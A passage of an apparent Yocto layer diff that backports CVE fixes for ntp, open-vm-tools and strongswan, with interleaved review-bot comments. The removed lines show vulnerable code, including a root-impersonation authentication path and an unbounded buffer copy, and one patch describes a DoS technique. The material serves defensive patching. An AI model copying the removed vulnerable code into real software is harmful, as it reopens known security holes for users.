++ */ ++ q = lfp->l_ui / 1000u; ++ r = lfp->l_ui - (q * 1000u); ++ lfp->l_ui = q; ++ ++ r = (r << 16) | (lfp->l_uf >> 16); ++ q = r / 1000u; ++ r = ((r - q * 1000) << 16) | (lfp->l_uf & 0x0FFFFu); ++ lfp->l_uf = q << 16; ++ q = r / 1000; ++ lfp->l_uf |= q; ++ r -= q * 1000u; ++ ++ /* fix sign */ ++ if (neg) ++ L_NEG(lfp); ++ /* round */ ++ if (r >= 500) ++ L_ADDF(lfp, (neg ? -1 : 1)); ++ return 1; + } +--- ntpd/refclock_palisade.c 2020-04-11 04:31:33.000000000 -0500 ++++ ../ntp-stable-p16-sec/ntpd/refclock_palisade.c 2023-04-15 18:09:29.787588000 -0500 +@@ -1225,9 +1225,9 @@ + return; /* using synchronous packet input */ + + if(up->type == CLK_PRAECIS) { +- if(write(peer->procptr->io.fd,"SPSTAT\r\n",8) < 0) ++ if (write(peer->procptr->io.fd,"SPSTAT\r\n",8) < 0) { + msyslog(LOG_ERR, "Palisade(%d) write: %m:",unit); +- else { ++ } else { + praecis_msg = 1; + return; + } +@@ -1249,20 +1249,53 @@ + + pp = peer->procptr; + +- memcpy(buf+p,rbufp->recv_space.X_recv_buffer, rbufp->recv_length); ++ if (p + rbufp->recv_length >= sizeof buf) { ++ struct palisade_unit *up; ++ up = pp->unitptr; ++ ++ /* ++ * We COULD see if there is a \r\n in the incoming ++ * buffer before it overflows, and then process the ++ * current line. ++ * ++ * Similarly, if we already have a hunk of data that ++ * we're now flushing, that will cause the line of ++ * data we're in the process of collecting to be garbage. ++ * ++ * Since we now check for this overflow and log when it ++ * happens, we're now in a better place to easily see ++ * what's going on and perhaps better choices can be made. ++ */ ++ ++ /* Do we need to log the size of the overflow? 
*/ ++ msyslog(LOG_ERR, "Palisade(%d) praecis_parse(): input buffer overflow", ++ up->unit); ++ ++ p = 0; ++ praecis_msg = 0; ++ ++ refclock_report(peer, CEVNT_BADREPLY); ++ ++ return; ++ } ++ ++ memcpy(buf+p, rbufp->recv_buffer, rbufp->recv_length); + p += rbufp->recv_length; + +- if(buf[p-2] == '\r' && buf[p-1] == '\n') { ++ if ( p >= 2 ++ && buf[p-2] == '\r' ++ && buf[p-1] == '\n') { + buf[p-2] = '\0'; + record_clock_stats(&peer->srcadr, buf); + + p = 0; + praecis_msg = 0; + +- if (HW_poll(pp) < 0) ++ if (HW_poll(pp) < 0) { + refclock_report(peer, CEVNT_FAULT); +- ++ } + } ++ return; + } + + static void +@@ -1407,7 +1440,10 @@ + + /* Edge trigger */ + if (up->type == CLK_ACUTIME) +- write (pp->io.fd, "", 1); ++ if (write (pp->io.fd, "", 1) != 1) ++ msyslog(LOG_WARNING, ++ "Palisade(%d) HW_poll: failed to send trigger: %m", ++ up->unit); + + if (ioctl(pp->io.fd, TIOCMSET, &x) < 0) { + #ifdef DEBUG +--- tests/libntp/strtolfp.c 2020-05-22 01:33:24.000000000 -0500 ++++ ../ntp-stable-p16-sec/tests/libntp/strtolfp.c 2023-04-16 03:28:16.967582000 -0500 +@@ -26,6 +26,13 @@ + return; + } + ++static const char* fmtLFP(const l_fp *e, const l_fp *a) ++{ ++ static char buf[100]; ++ snprintf(buf, sizeof(buf), "e=$%08x.%08x, a=$%08x.%08x", ++ e->l_ui, e->l_uf, a->l_ui, a->l_uf); ++ return buf; ++} + + void test_PositiveInteger(void) { + const char *str = "500"; +@@ -37,8 +44,8 @@ + TEST_ASSERT_TRUE(atolfp(str, &actual)); + TEST_ASSERT_TRUE(mstolfp(str_ms, &actual_ms)); + +- TEST_ASSERT_TRUE(IsEqual(expected, actual)); +- TEST_ASSERT_TRUE(IsEqual(expected, actual_ms)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual), fmtLFP(&expected, &actual)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual_ms), fmtLFP(&expected, &actual_ms)); + } + + void test_NegativeInteger(void) { +@@ -54,8 +61,8 @@ + TEST_ASSERT_TRUE(atolfp(str, &actual)); + TEST_ASSERT_TRUE(mstolfp(str_ms, &actual_ms)); + +- TEST_ASSERT_TRUE(IsEqual(expected, actual)); +- TEST_ASSERT_TRUE(IsEqual(expected, 
actual_ms)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual), fmtLFP(&expected, &actual)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual_ms), fmtLFP(&expected, &actual_ms)); + } + + void test_PositiveFraction(void) { +@@ -68,8 +75,8 @@ + TEST_ASSERT_TRUE(atolfp(str, &actual)); + TEST_ASSERT_TRUE(mstolfp(str_ms, &actual_ms)); + +- TEST_ASSERT_TRUE(IsEqual(expected, actual)); +- TEST_ASSERT_TRUE(IsEqual(expected, actual_ms)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual), fmtLFP(&expected, &actual)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual_ms), fmtLFP(&expected, &actual_ms)); + } + + void test_NegativeFraction(void) { +@@ -85,8 +92,8 @@ + TEST_ASSERT_TRUE(atolfp(str, &actual)); + TEST_ASSERT_TRUE(mstolfp(str_ms, &actual_ms)); + +- TEST_ASSERT_TRUE(IsEqual(expected, actual)); +- TEST_ASSERT_TRUE(IsEqual(expected, actual_ms)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual), fmtLFP(&expected, &actual)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual_ms), fmtLFP(&expected, &actual_ms)); + } + + void test_PositiveMsFraction(void) { +@@ -100,9 +107,8 @@ + TEST_ASSERT_TRUE(atolfp(str, &actual)); + TEST_ASSERT_TRUE(mstolfp(str_ms, &actual_ms)); + +- TEST_ASSERT_TRUE(IsEqual(expected, actual)); +- TEST_ASSERT_TRUE(IsEqual(expected, actual_ms)); +- ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual), fmtLFP(&expected, &actual)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual_ms), fmtLFP(&expected, &actual_ms)); + } + + void test_NegativeMsFraction(void) { +@@ -118,9 +124,8 @@ + TEST_ASSERT_TRUE(atolfp(str, &actual)); + TEST_ASSERT_TRUE(mstolfp(str_ms, &actual_ms)); + +- TEST_ASSERT_TRUE(IsEqual(expected, actual)); +- TEST_ASSERT_TRUE(IsEqual(expected, actual_ms)); +- ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual), fmtLFP(&expected, &actual)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual_ms), fmtLFP(&expected, &actual_ms)); + } + + void test_InvalidChars(void) { 
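Review bot: CVE-2023-2655x.patch is added with `new file mode 100755`, while the other patch files visible on this page are added as `100644`. A patch is data applied by the fetcher and should not carry the executable bit, so it should be committed as `100644`. Inside the backported `mstolfp()`, the `switch (ch)` relies on `case '-'` falling through into `case '+'` to advance `str`, which reads like a missing `break`. If the patch is ever refreshed against upstream, a `/* FALLTHROUGH */` comment after `neg = TRUE;` would make the intent explicit.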
diff --git a/meta-networking/recipes-support/ntp/ntp_4.2.8p15.bb b/meta-networking/recipes-support/ntp/ntp_4.2.8p15.bb index a30f720bb5..7861a5e3e6 100644 --- a/meta-networking/recipes-support/ntp/ntp_4.2.8p15.bb +++ b/meta-networking/recipes-support/ntp/ntp_4.2.8p15.bb @@ -24,11 +24,13 @@ SRC_URI = "http://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-${PV}.tar.g file://sntp.service \ file://sntp \ file://ntpd.list \ + file://CVE-2023-2655x.patch;striplevel=0 \ " SRC_URI[sha256sum] = "f65840deab68614d5d7ceb2d0bb9304ff70dcdedd09abb79754a87536b849c19" # CVE-2016-9312 is only for windows. +# CVE-2019-11331 is inherent to RFC 5905 and cannot be fixed without breaking compatibility # The other CVEs are not correctly identified because cve-check # is not able to check the version correctly (it only checks for 4.2.8 omitting p15 that makes the difference) CVE_CHECK_IGNORE += "\ @@ -52,6 +54,7 @@ CVE_CHECK_IGNORE += "\ CVE-2016-7433 \ CVE-2016-9310 \ CVE-2016-9311 \ + CVE-2019-11331 \ " @@ -90,6 +93,14 @@ PACKAGECONFIG[debug] = "--enable-debugging,--disable-debugging" PACKAGECONFIG[mdns] = "ac_cv_header_dns_sd_h=yes,ac_cv_header_dns_sd_h=no,mdns" PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6," +do_configure:append() { + # tests are generated but also checked-in to source control + # when CVE-2023-2655x.patch changes timestamp of test source file, Makefile detects it and tries to regenerate it + # however it fails because of missing ruby interpretter; adding ruby-native as dependency fixes it + # since the regenerated file is identical to the one from source control, touch the generated file instead of adding heavy dependency + touch ${S}/tests/libntp/run-strtolfp.c +} + do_install:append() { install -d ${D}${sysconfdir}/init.d install -m 644 ${WORKDIR}/ntp.conf ${D}${sysconfdir} 
diff --git a/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-20867.patch b/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-20867.patch new file mode 100644 index 0000000000..071ddf45d1 --- /dev/null +++ b/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-20867.patch 
@@ -0,0 +1,158 @@ +From 32fe1b6ac239255a91020020510453685459b28a Mon Sep 17 00:00:00 2001 +From: John Wolfe <jwolfe@vmware.com> +Date: Mon, 8 May 2023 19:04:57 -0700 +Subject: [PATCH] open-vm-tools: Remove some dead code. + +Address CVE-2023-20867. +Remove some authentication types which were deprecated long +ago and are no longer in use. These are dead code. + +Upstream-Status: Backport [https://github.com/vmware/open-vm-tools/blob/CVE-2023-20867.patch/2023-20867-Remove-some-dead-code.patch] +CVE: CVE-2023-20867 + +Signed-off-by: Meenali Gupta <meenali.gupta@windriver.com> +--- + open-vm-tools/services/plugins/vix/vixTools.c | 100 ------------------ + 1 file changed, 100 deletions(-) + +diff --git a/open-vm-tools/services/plugins/vix/vixTools.c b/open-vm-tools/services/plugins/vix/vixTools.c +index bde74021..6e51d1f4 100644 +--- a/open-vm-tools/services/plugins/vix/vixTools.c ++++ b/open-vm-tools/services/plugins/vix/vixTools.c +@@ -254,7 +254,6 @@ char *gImpersonatedUsername = NULL; + #define VIX_TOOLS_CONFIG_API_AUTHENTICATION "Authentication" + #define VIX_TOOLS_CONFIG_AUTHTYPE_AGENTS "InfrastructureAgents" + +-#define VIX_TOOLS_CONFIG_INFRA_AGENT_DISABLED_DEFAULT TRUE + + /* + * The switch that controls all APIs +@@ -730,8 +729,6 @@ VixError GuestAuthSAMLAuthenticateAndImpersonate( + + void GuestAuthUnimpersonate(); + +-static Bool VixToolsCheckIfAuthenticationTypeEnabled(GKeyFile *confDictRef, +- const char *typeName); + + #if SUPPORT_VGAUTH + +@@ -7913,29 +7910,6 @@ VixToolsImpersonateUser(VixCommandRequestHeader *requestMsg, // IN + userToken); + break; + } +- case VIX_USER_CREDENTIAL_ROOT: +- { +- if ((requestMsg->requestFlags & VIX_REQUESTMSG_HAS_HASHED_SHARED_SECRET) && +- !VixToolsCheckIfAuthenticationTypeEnabled(gConfDictRef, +- VIX_TOOLS_CONFIG_AUTHTYPE_AGENTS)) { +- /* +- * Don't accept hashed shared secret if disabled. 
+- */ +- g_message("%s: Requested authentication type has been disabled.\n", +- __FUNCTION__); +- err = VIX_E_GUEST_AUTHTYPE_DISABLED; +- goto done; +- } +- } +- // fall through +- +- case VIX_USER_CREDENTIAL_CONSOLE_USER: +- err = VixToolsImpersonateUserImplEx(NULL, +- credentialType, +- NULL, +- loadUserProfile, +- userToken); +- break; + case VIX_USER_CREDENTIAL_NAME_PASSWORD: + case VIX_USER_CREDENTIAL_NAME_PASSWORD_OBFUSCATED: + case VIX_USER_CREDENTIAL_NAMED_INTERACTIVE_USER: +@@ -8104,36 +8078,6 @@ VixToolsImpersonateUserImplEx(char const *credentialTypeStr, // IN + } + } + +- /* +- * If the VMX asks to be root, then we allow them. +- * The VMX will make sure that only it will pass this value in, +- * and only when the VM and host are configured to allow this. +- */ +- if ((VIX_USER_CREDENTIAL_ROOT == credentialType) +- && (thisProcessRunsAsRoot)) { +- *userToken = PROCESS_CREATOR_USER_TOKEN; +- +- gImpersonatedUsername = Util_SafeStrdup("_ROOT_"); +- err = VIX_OK; +- goto quit; +- } +- +- /* +- * If the VMX asks to be root, then we allow them. +- * The VMX will make sure that only it will pass this value in, +- * and only when the VM and host are configured to allow this. +- * +- * XXX This has been deprecated XXX +- */ +- if ((VIX_USER_CREDENTIAL_CONSOLE_USER == credentialType) +- && ((allowConsoleUserOps) || !(thisProcessRunsAsRoot))) { +- *userToken = PROCESS_CREATOR_USER_TOKEN; +- +- gImpersonatedUsername = Util_SafeStrdup("_CONSOLE_USER_NAME_"); +- err = VIX_OK; +- goto quit; +- } +- + /* + * If the VMX asks us to run commands in the context of the current + * user, make sure that the user who requested the command is the +@@ -10814,50 +10758,6 @@ VixToolsCheckIfVixCommandEnabled(int opcode, // IN + } + + +-/* +- *----------------------------------------------------------------------------- +- * +- * VixToolsCheckIfAuthenticationTypeEnabled -- +- * +- * Checks to see if a given authentication type has been +- * disabled via the tools configuration. 
+- * +- * Return value: +- * TRUE if enabled, FALSE otherwise. +- * +- * Side effects: +- * None +- * +- *----------------------------------------------------------------------------- +- */ +- +-static Bool +-VixToolsCheckIfAuthenticationTypeEnabled(GKeyFile *confDictRef, // IN +- const char *typeName) // IN +-{ +- char authnDisabledName[64]; // Authentication.<AuthenticationType>.disabled +- gboolean disabled; +- +- Str_Snprintf(authnDisabledName, sizeof(authnDisabledName), +- VIX_TOOLS_CONFIG_API_AUTHENTICATION ".%s.disabled", +- typeName); +- +- ASSERT(confDictRef != NULL); +- +- /* +- * XXX Skip doing the strcmp() to verify the auth type since we only +- * have the one typeName (VIX_TOOLS_CONFIG_AUTHTYPE_AGENTS), and default +- * it to VIX_TOOLS_CONFIG_INFRA_AGENT_DISABLED_DEFAULT. +- */ +- disabled = VMTools_ConfigGetBoolean(confDictRef, +- VIX_TOOLS_CONFIG_API_GROUPNAME, +- authnDisabledName, +- VIX_TOOLS_CONFIG_INFRA_AGENT_DISABLED_DEFAULT); +- +- return !disabled; +-} +- +- + /* + *----------------------------------------------------------------------------- + * +-- +2.40.0 diff --git a/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-20900.patch b/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-20900.patch new file mode 100644 index 0000000000..1b51e500aa --- /dev/null +++ b/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-20900.patch 
@@ -0,0 +1,36 @@
+From 108d81c70d0a6792847051d121a660ef3511517d Mon Sep 17 00:00:00 2001
+From: Katy Feng <fkaty@vmware.com>
+Date: Fri, 22 Sep 2023 10:15:58 +0000
+Subject: [PATCH] Allow only X509 certs to verify the SAML token signature.
+
+CVE: CVE-2023-20900
+
+Upstream-Status: Backport [https://github.com/vmware/open-vm-tools/commit/74b6d0d9000eda1a2c8f31c40c725fb0b8520b16]
+
+Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
+---
+ open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c | 9 ++++++++-
+ 1 file changed, 8 insertions(+), 1 deletion(-)
+
+diff --git a/open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c b/open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c
+index aaa5082a..ad8fe304 100644
+--- a/open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c
++++ b/open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c
+@@ -1273,7 +1273,14 @@ VerifySignature(xmlDocPtr doc,
+ */
+ bRet = RegisterID(xmlDocGetRootElement(doc), "ID");
+ if (bRet == FALSE) {
+- g_warning("failed to register ID\n");
++ g_warning("Failed to register ID\n");
++ goto done;
++ }
++
++ /* Use only X509 certs to validate the signature */
++ if (xmlSecPtrListAdd(&(dsigCtx->keyInfoReadCtx.enabledKeyData),
++ BAD_CAST xmlSecKeyDataX509Id) < 0) {
++ g_warning("Failed to limit allowed key data\n");
+ goto done;
+ }
+
+--
+2.40.0
diff --git a/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-34058.patch b/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-34058.patch
new file mode 100644
index 0000000000..d24dd3695c
--- /dev/null
+++ b/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-34058.patch
@@ -0,0 +1,241 @@ +From 6822b5a84f8cfa60d46479d6b8f1c63eb85eac87 Mon Sep 17 00:00:00 2001 +From: John Wolfe <jwolfe@vmware.com> +Date: Wed, 18 Oct 2023 09:04:07 -0700 +Subject: [PATCH] Address CVE-2023-34058 + +VGAuth: don't accept tokens with unrelated certs. + +CVE: CVE-2023-34058 + +Upstream-Status: Backport [https://github.com/vmware/open-vm-tools/commit/e5be40b9cc025d03ccd5689ef9192d29abd68bfe] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + open-vm-tools/vgauth/common/certverify.c | 145 ++++++++++++++++++ + open-vm-tools/vgauth/common/certverify.h | 4 + + open-vm-tools/vgauth/common/prefs.h | 2 + + .../vgauth/serviceImpl/saml-xmlsec1.c | 14 ++ + 4 files changed, 165 insertions(+) + +diff --git a/open-vm-tools/vgauth/common/certverify.c b/open-vm-tools/vgauth/common/certverify.c +index edf54928..29b12df3 100644 +--- a/open-vm-tools/vgauth/common/certverify.c ++++ b/open-vm-tools/vgauth/common/certverify.c +@@ -893,3 +893,148 @@ done: + + return err; + } ++ ++ ++/* ++ * Finds a cert with a subject (if checkSubj is set) or issuer (if ++ * checkSUbj is unset), matching 'val' in the list ++ * of certs. Returns a match or NULL. ++ */ ++ ++static X509 * ++FindCert(GList *cList, ++ X509_NAME *val, ++ int checkSubj) ++{ ++ GList *l; ++ X509 *c; ++ X509_NAME *v; ++ ++ l = cList; ++ while (l != NULL) { ++ c = (X509 *) l->data; ++ if (checkSubj) { ++ v = X509_get_subject_name(c); ++ } else { ++ v = X509_get_issuer_name(c); ++ } ++ if (X509_NAME_cmp(val, v) == 0) { ++ return c; ++ } ++ l = l->next; ++ } ++ return NULL; ++} ++ ++ ++/* ++ ****************************************************************************** ++ * CertVerify_CheckForUnrelatedCerts -- */ /** ++ * ++ * Looks over a list of certs. If it finds that they are not all ++ * part of the same chain, returns failure. ++ * ++ * @param[in] numCerts The number of certs in the chain. ++ * @param[in] pemCerts The chain of certificates to verify. 
++ * ++ * @return VGAUTH_E_OK on success, VGAUTH_E_FAIL if unrelated certs are found. ++ * ++ ****************************************************************************** ++ */ ++ ++VGAuthError ++CertVerify_CheckForUnrelatedCerts(int numCerts, ++ const char **pemCerts) ++{ ++ VGAuthError err = VGAUTH_E_FAIL; ++ int chainLen = 0; ++ int i; ++ X509 **certs = NULL; ++ GList *rawList = NULL; ++ X509 *baseCert; ++ X509 *curCert; ++ X509_NAME *subject; ++ X509_NAME *issuer; ++ ++ /* common single cert case; nothing to do */ ++ if (numCerts == 1) { ++ return VGAUTH_E_OK; ++ } ++ ++ /* convert all PEM to X509 objects */ ++ certs = g_malloc0(numCerts * sizeof(X509 *)); ++ for (i = 0; i < numCerts; i++) { ++ certs[i] = CertStringToX509(pemCerts[i]); ++ if (NULL == certs[i]) { ++ g_warning("%s: failed to convert cert to X509\n", __FUNCTION__); ++ goto done; ++ } ++ } ++ ++ /* choose the cert to start the chain. shouldn't matter which */ ++ baseCert = certs[0]; ++ ++ /* put the rest into a list */ ++ for (i = 1; i < numCerts; i++) { ++ rawList = g_list_append(rawList, certs[i]); ++ } ++ ++ /* now chase down to a leaf, looking for certs the baseCert issued */ ++ subject = X509_get_subject_name(baseCert); ++ while ((curCert = FindCert(rawList, subject, 0)) != NULL) { ++ /* pull it from the list */ ++ rawList = g_list_remove(rawList, curCert); ++ /* set up the next find */ ++ subject = X509_get_subject_name(curCert); ++ } ++ ++ /* ++ * walk up to the root cert, by finding a cert where the ++ * issuer equals the subject of the current ++ */ ++ issuer = X509_get_issuer_name(baseCert); ++ while ((curCert = FindCert(rawList, issuer, 1)) != NULL) { ++ /* pull it from the list */ ++ rawList = g_list_remove(rawList, curCert); ++ /* set up the next find */ ++ issuer = X509_get_issuer_name(curCert); ++ } ++ ++ /* ++ * At this point, anything on the list should be certs that are not part ++ * of the chain that includes the original 'baseCert'. 
++ * ++ * For a valid token, the list should be empty. ++ */ ++ chainLen = g_list_length(rawList); ++ if (chainLen != 0 ) { ++ GList *l; ++ ++ g_warning("%s: %d unrelated certs found in list\n", ++ __FUNCTION__, chainLen); ++ ++ /* debug helper */ ++ l = rawList; ++ while (l != NULL) { ++ X509* c = (X509 *) l->data; ++ char *s = X509_NAME_oneline(X509_get_subject_name(c), NULL, 0); ++ ++ g_debug("%s: unrelated cert subject: %s\n", __FUNCTION__, s); ++ free(s); ++ l = l->next; ++ } ++ ++ goto done; ++ } ++ ++ g_debug("%s: Success! no unrelated certs found\n", __FUNCTION__); ++ err = VGAUTH_E_OK; ++ ++done: ++ g_list_free(rawList); ++ for (i = 0; i < numCerts; i++) { ++ X509_free(certs[i]); ++ } ++ g_free(certs); ++ return err; ++} +diff --git a/open-vm-tools/vgauth/common/certverify.h b/open-vm-tools/vgauth/common/certverify.h +index d7c6410b..f582bb82 100644 +--- a/open-vm-tools/vgauth/common/certverify.h ++++ b/open-vm-tools/vgauth/common/certverify.h +@@ -67,6 +67,10 @@ VGAuthError CertVerify_CheckSignatureUsingCert(VGAuthHashAlg hash, + size_t signatureLen, + const unsigned char *signature); + ++ ++VGAuthError CertVerify_CheckForUnrelatedCerts(int numCerts, ++ const char **pemCerts); ++ + gchar * CertVerify_StripPEMCert(const gchar *pemCert); + + gchar * CertVerify_CertToX509String(const gchar *pemCert); +diff --git a/open-vm-tools/vgauth/common/prefs.h b/open-vm-tools/vgauth/common/prefs.h +index ff116928..87ccc9b3 100644 +--- a/open-vm-tools/vgauth/common/prefs.h ++++ b/open-vm-tools/vgauth/common/prefs.h +@@ -136,6 +136,8 @@ msgCatalog = /etc/vmware-tools/vgauth/messages + #define VGAUTH_PREF_ALIASSTORE_DIR "aliasStoreDir" + /** The number of seconds slack allowed in either direction in SAML token date checks. */ + #define VGAUTH_PREF_CLOCK_SKEW_SECS "clockSkewAdjustment" ++/** If unrelated certificates are allowed in a SAML token */ ++#define VGAUTH_PREF_ALLOW_UNRELATED_CERTS "allowUnrelatedCerts" + + /** Ticket group name. 
*/ + #define VGAUTH_PREF_GROUP_NAME_TICKET "ticket" +diff --git a/open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c b/open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c +index aaa5082a..17b56de9 100644 +--- a/open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c ++++ b/open-vm-tools/vgauth/serviceImpl/saml-xmlsec1.c +@@ -47,6 +47,7 @@ + #include "vmxlog.h" + + static int gClockSkewAdjustment = VGAUTH_PREF_DEFAULT_CLOCK_SKEW_SECS; ++static gboolean gAllowUnrelatedCerts = FALSE; + static xmlSchemaPtr gParsedSchemas = NULL; + static xmlSchemaValidCtxtPtr gSchemaValidateCtx = NULL; + +@@ -313,6 +314,10 @@ LoadPrefs(void) + VGAUTH_PREF_DEFAULT_CLOCK_SKEW_SECS); + Log("%s: Allowing %d of clock skew for SAML date validation\n", + __FUNCTION__, gClockSkewAdjustment); ++ gAllowUnrelatedCerts = Pref_GetBool(gPrefs, ++ VGAUTH_PREF_ALLOW_UNRELATED_CERTS, ++ VGAUTH_PREF_GROUP_NAME_SERVICE, ++ FALSE); + } + + +@@ -1526,6 +1531,15 @@ SAML_VerifyBearerTokenAndChain(const char *xmlText, + if (FALSE == bRet) { + return VGAUTH_E_AUTHENTICATION_DENIED; + } ++ if (!gAllowUnrelatedCerts) { ++ err = CertVerify_CheckForUnrelatedCerts(num, (const char **) certChain); ++ if (err != VGAUTH_E_OK) { ++ VMXLog_Log(VMXLOG_LEVEL_WARNING, ++ "Unrelated certs found in SAML token, failing\n"); ++ return VGAUTH_E_AUTHENTICATION_DENIED; ++ } ++ } ++ + + subj.type = SUBJECT_TYPE_NAMED; + subj.name = *subjNameOut; +-- +2.40.0 diff --git a/meta-networking/recipes-support/open-vm-tools/open-vm-tools_11.3.5.bb b/meta-networking/recipes-support/open-vm-tools/open-vm-tools_11.3.5.bb index 4670a85a67..c54fd4de48 100644 --- a/meta-networking/recipes-support/open-vm-tools/open-vm-tools_11.3.5.bb +++ b/meta-networking/recipes-support/open-vm-tools/open-vm-tools_11.3.5.bb 
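Review bot: `CertVerify_CheckForUnrelatedCerts` in CVE-2023-34058.patch returns early only for `numCerts == 1`, so a count of zero would reach `baseCert = certs[0]` with `certs` NULL after `g_malloc0(0)`, and a negative count would flow into the allocation size. Whether `SAML_VerifyBearerTokenAndChain` can ever pass such a count is not visible in the hunk, and a guard such as `if (numCerts < 1) return VGAUTH_E_FAIL;` ahead of the single-cert shortcut would make the function safe on its own. The debug loop releases the `X509_NAME_oneline()` result with `free(s)`, where OpenSSL expects `OPENSSL_free(s)` for a buffer it allocated. The relatedness test compares subject and issuer names only, so its header comment should say it is a structural check and not a substitute for verifying the chain's signatures. All three points are in backported upstream code, so they are best raised upstream rather than patched locally.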
@@ -45,6 +45,9 @@ SRC_URI = "git://github.com/vmware/open-vm-tools.git;protocol=https;branch=maste file://0002-hgfsServerLinux-Consider-64bit-time_t-possibility.patch;patchdir=.. \ file://0001-open-vm-tools-Correct-include-path-for-poll.h.patch;patchdir=.. \ file://0001-Properly-check-authorization-on-incoming-guestOps-re.patch;patchdir=.. \ + file://CVE-2023-20867.patch;patchdir=.. \ + file://CVE-2023-20900.patch;patchdir=.. \ + file://CVE-2023-34058.patch;patchdir=.. \ " UPSTREAM_CHECK_GITTAGREGEX = "stable-(?P<pver>\d+(\.\d+)+)" diff --git a/meta-networking/recipes-support/openvpn/openvpn_2.5.6.bb b/meta-networking/recipes-support/openvpn/openvpn_2.5.6.bb index 218e72b7a8..828cd5033e 100644 --- a/meta-networking/recipes-support/openvpn/openvpn_2.5.6.bb +++ b/meta-networking/recipes-support/openvpn/openvpn_2.5.6.bb @@ -19,6 +19,9 @@ SRC_URI[sha256sum] = "333a7ef3d5b317968aca2c77bdc29aa7c6d6bb3316eb3f79743b59c532 # CVE-2020-7224 and CVE-2020-27569 are for Aviatrix OpenVPN client, not for openvpn. CVE_CHECK_IGNORE += "CVE-2020-7224 CVE-2020-27569" +# CVE-2023-7235 is specific to Windows platform +CVE_CHECK_IGNORE += "CVE-2023-7235" + SYSTEMD_SERVICE:${PN} += "openvpn@loopback-server.service openvpn@loopback-client.service" SYSTEMD_AUTO_ENABLE = "disable" diff --git a/meta-networking/recipes-support/spice/spice-protocol_0.14.4.bb b/meta-networking/recipes-support/spice/spice-protocol_0.14.4.bb index 9ce019ed86..3c8458baac 100644 --- a/meta-networking/recipes-support/spice/spice-protocol_0.14.4.bb +++ b/meta-networking/recipes-support/spice/spice-protocol_0.14.4.bb @@ -16,4 +16,6 @@ S = "${WORKDIR}/git" inherit meson pkgconfig +ALLOW_EMPTY:${PN} = "1" + BBCLASSEXTEND = "native nativesdk" diff --git a/meta-networking/recipes-support/strongswan/files/CVE-2022-40617.patch b/meta-networking/recipes-support/strongswan/files/CVE-2022-40617.patch new file mode 100644 index 0000000000..ffef6800eb --- /dev/null 
+++ b/meta-networking/recipes-support/strongswan/files/CVE-2022-40617.patch 
@@ -0,0 +1,157 @@ +From 6a6c275534e31b41f6d203cfd92685b7526a45e8 Mon Sep 17 00:00:00 2001 +From: Hitendra Prajapati <hprajapati@mvista.com> +Date: Fri, 11 Nov 2022 10:15:38 +0530 +Subject: [PATCH] CVE-2022-40617 + +Upstream-Status: Backport [https://download.strongswan.org/security/CVE-2022-40617] +CVE: CVE-2022-40617 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> + +credential-manager: Do online revocation checks only after + basic trust chain validation + +This avoids querying URLs of potentially untrusted certificates, e.g. if +an attacker sends a specially crafted end-entity and intermediate CA +certificate with a CDP that points to a server that completes the +TCP handshake but then does not send any further data, which will block +the fetcher thread (depending on the plugin) for as long as the default +timeout for TCP. Doing that multiple times will block all worker threads, +leading to a DoS attack. + +The logging during the certificate verification obviously changes. 
+--- + .../credentials/credential_manager.c | 54 +++++++++++++++---- + 1 file changed, 45 insertions(+), 9 deletions(-) + +diff --git a/src/libstrongswan/credentials/credential_manager.c b/src/libstrongswan/credentials/credential_manager.c +index 3be0190..f65372b 100644 +--- a/src/libstrongswan/credentials/credential_manager.c ++++ b/src/libstrongswan/credentials/credential_manager.c +@@ -555,7 +555,7 @@ static void cache_queue(private_credential_manager_t *this) + */ + static bool check_lifetime(private_credential_manager_t *this, + certificate_t *cert, char *label, +- int pathlen, bool trusted, auth_cfg_t *auth) ++ int pathlen, bool anchor, auth_cfg_t *auth) + { + time_t not_before, not_after; + cert_validator_t *validator; +@@ -570,7 +570,7 @@ static bool check_lifetime(private_credential_manager_t *this, + continue; + } + status = validator->check_lifetime(validator, cert, +- pathlen, trusted, auth); ++ pathlen, anchor, auth); + if (status != NEED_MORE) + { + break; +@@ -603,13 +603,13 @@ static bool check_lifetime(private_credential_manager_t *this, + */ + static bool check_certificate(private_credential_manager_t *this, + certificate_t *subject, certificate_t *issuer, bool online, +- int pathlen, bool trusted, auth_cfg_t *auth) ++ int pathlen, bool anchor, auth_cfg_t *auth) + { + cert_validator_t *validator; + enumerator_t *enumerator; + + if (!check_lifetime(this, subject, "subject", pathlen, FALSE, auth) || +- !check_lifetime(this, issuer, "issuer", pathlen + 1, trusted, auth)) ++ 